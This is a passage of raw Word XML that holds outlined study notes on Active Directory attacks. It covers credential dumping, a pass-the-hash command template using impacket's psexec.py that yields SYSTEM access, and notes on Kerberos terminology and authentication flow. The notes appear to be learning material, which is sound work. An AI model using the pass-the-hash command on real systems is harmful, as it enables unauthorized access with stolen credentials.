        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>dumps out stored user secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8537E" w14:textId="50014EF5" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>pass the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EDF93" w14:textId="340A038E" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>psexec.py (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F373F64" w14:textId="3DEF86E2" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>psexec.py &lt;username&gt;@&lt;ip&gt; -hashes &lt;hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29167262" w14:textId="4EED1090" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77A13B60" w14:textId="03E8D5C5" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D8AAF" w14:textId="7F5B4203" w:rsidR="00A73C78" w:rsidRPr="0084205E" w:rsidRDefault="00A73C78" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B006E90" w14:textId="4B935C5A" w:rsidR="00332429" w:rsidRPr="0084205E" w:rsidRDefault="00332429" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Elevating Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4AC441" w14:textId="34CD6A55" w:rsidR="00332429" w:rsidRPr="0084205E" w:rsidRDefault="00332429" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="002D155C" w:rsidRPr="0084205E">
        <w:t>newfound</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> account credential</w:t>
      </w:r>
      <w:r w:rsidR="00C579CE" w:rsidRPr="0084205E">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477504C9" w14:textId="61AC9954" w:rsidR="00C579CE" w:rsidRPr="0084205E" w:rsidRDefault="00C579CE" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1777A1FC" w14:textId="3B8A1BB4" w:rsidR="00C579CE" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attacking Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272094A5" w14:textId="2FB97251" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Kerberos is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786351E8" w14:textId="2FC02AD3" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common Terminology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A37A043" w14:textId="775674DB" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ticket Granting Ticket – authentication ticket used to request service tickets for specific resources from the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACDE92C" w14:textId="3CC5FAD4" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Key Distribution Center – issues TGTs and service tickets that consist of the Authentication Service and Ticket Granting Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1234743B" w14:textId="0A649FCF" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authentication Service – issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153778E" w14:textId="2A91B305" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ticket Granting Service – takes TGT and returns a ticket to a machine on the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D96D7" w14:textId="292652FE" w:rsidR="00AB4098" w:rsidRPr="0084205E" w:rsidRDefault="00AB4098" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:r w:rsidR="002A597E" w:rsidRPr="0084205E">
        <w:t>Principal</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Name </w:t>
      </w:r>
      <w:r w:rsidR="00241E2D" w:rsidRPr="0084205E">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00241E2D" w:rsidRPr="0084205E">
        <w:t>identifier given to a service instance to associate a service instance with a domain service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D7611" w14:textId="5FB0903B" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>windows requires that services have a domain service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A11FC" w14:textId="5946AFA5" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>why a service needs SPN set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A3EE3" w14:textId="77777777" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB4656" w14:textId="77777777" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275609BD" w14:textId="77777777" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC06FDA" w14:textId="77777777" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD3FE3" w14:textId="2F2C10C8" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Privilege Attribute Certificate (PAC) - The PAC holds </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C8EA4" w14:textId="7E9AC32F" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REQ w/ Pre-Authentication in Detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123EEDD2" w14:textId="6B1E9490" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>starts when a user requests a TGT from KDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3659CB" w14:textId="59F681CB" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to validate user and create a TGT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DE3970" w14:textId="6415BAF6" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">user encrypts a timestamp NT hash and sends it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B25ABE" w14:textId="02B09B01" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KDC attempts to decrypt timestamp using NT hash from user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C372431" w14:textId="7262408B" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if successful – KDC will issue TGT and session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52FBF9" w14:textId="5D36C82C" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ticket Granting Ticket Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA2C69" w14:textId="182DA356" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TGT provided by user to KDC and KDC validates the TGT and returns a service ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DFE8C5" w14:textId="22C7E2AF" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service Ticket Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695007CC" w14:textId="3112462E" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>contains two portions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B17CC" w14:textId="2C073AB9" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>service provided portion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64A75F" w14:textId="358FD49F" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>user details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DCB425" w14:textId="5F679C2C" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF24B8" w14:textId="68DB172A" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>encrypts the ticket with service account NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BF4F3E" w14:textId="38148305" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>user-provided portion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F32BB7" w14:textId="1489429E" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>validity timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD5C5F" w14:textId="349F6FBB" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638E2A14" w14:textId="2155B0E3" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>encrypts with the TGT session key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6FCAC8" w14:textId="79D2AF3A" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="00241E2D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberos Authentication Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229938E3" w14:textId="4CF68A64" w:rsidR="00241E2D" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AS-REQ – client requests authentication ticket or ticket granting ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29280116" w14:textId="5DAB33B0" w:rsidR="002A597E" w:rsidRPr="0084205E" w:rsidRDefault="002A597E" w:rsidP="0084205E">
      <w:pPr>
